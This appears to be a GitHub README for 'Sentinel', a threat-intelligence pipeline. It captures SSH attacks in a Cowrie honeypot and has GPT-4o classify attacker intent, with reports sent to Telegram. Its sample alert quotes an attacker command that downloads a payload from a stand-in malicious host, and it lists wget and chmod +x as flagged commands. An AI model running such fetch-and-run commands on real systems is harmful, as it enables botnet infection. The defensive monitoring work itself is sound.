An autonomous threat intelligence pipeline that captures SSH brute-force attacks via a Dockerized honeypot, analyzes attacker intent with AI, and delivers real-time threat reports through Telegram.
Sentinel goes beyond simple logging. By combining a high-interaction SSH honeypot with an AI analyst and session-based log buffering, it transforms raw attack data into actionable security intelligence — identifying attacker intent, categorizing attack patterns, and delivering structured reports in real-time.
┌──────────┐ SSH ┌─────────────────────┐
│ Attacker │ ─────────► │ AWS EC2 Instance │
└──────────┘ │ ┌─────────────────┐ │
│ │ Cowrie Honeypot │ │
│ │ (Docker) │ │
│ └────────┬────────┘ │
│ │ logs │
│ ┌────────▼────────┐ │
│ │ Python Monitor │ │
│ │ (Edge Buffer) │ │
│ └────────┬────────┘ │
└───────────┼──────────┘
│ aggregated payload
┌────────▼────────┐
│ n8n Webhook │
│ │ │
│ ┌────▼─────┐ │
│ │ OpenAI │ │
│ │ GPT-4o │ │
│ └────┬─────┘ │
└───────┼──────────┘
│ threat report
┌───────▼──────────┐
│ Telegram Alert │
└──────────────────┘
Dockerized Cowrie SSH/Telnet simulator deployed on AWS EC2. Captures keystrokes, command history, downloaded files, and session metadata in an isolated environment.
Instead of sending every log line to the cloud (which caused API cost explosion during brute-force attacks), the Python monitor aggregates logs locally by Session ID and waits for a 120-second idle period before transmitting.
Result: ~95% reduction in API calls while providing the AI with full attack context.
An integrated OpenAI agent (GPT-4o) analyzes command chains to:
- Categorize attack type (Brute-force, Reconnaissance, Crypto-mining, Botnet Injection)
- Identify critical commands (
wget,chmod +x,mkdir) - Filter automated noise to focus on sophisticated intrusion attempts
Structured threat reports delivered instantly via Telegram with attacker IP, geolocation, session duration, event count, and AI-generated intent analysis.
Attacker IP: 192.168.x.x
Origin: Brazil (BR)
Session Duration: 45 Seconds
Events Recorded: 12 Actions
Critical Command: wget http://malicious-site/payload.sh
AI Analysis: The attacker connected from a known botnet IP range.
They attempted to download a malicious payload and changed file
permissions with chmod +x. This matches Mirai Botnet variant behavior.
cloud-honeypot/
├── src/
│ └── log-monitor.py # Edge buffering engine + webhook transmission
├── workflows/
│ └── sentinel_workflow.json # n8n automation (Webhook → OpenAI → Telegram)
├── assets/ # Documentation screenshots
├── .env.example # Environment variable template
├── requirements.txt # Python dependencies
└── README.md
- AWS EC2 instance (Ubuntu/Linux)
- Docker & Docker Compose
- n8n Cloud account (or self-hosted)
- OpenAI API key
- Telegram Bot token + Chat ID
cd deployment
docker-compose up -dcp .env.example .env
nano .env
# Add your n8n Webhook URLpip install -r requirements.txt
python src/log-monitor.py| Component | Screenshot |
|---|---|
| AI-Generated Threat Report (Telegram) |  |
| n8n Automation Workflow |  |
| Real-Time Terminal Monitoring |  |
For educational and research purposes only. This system captures real-time data including IP addresses and command logs. Collected data is processed via third-party services (n8n, OpenAI). Users must ensure compliance with local data privacy regulations (GDPR, KVKK). Do not use this system to process PII or sensitive corporate data.
GitHub: sedat4ras | Email: sudo@sedataras.com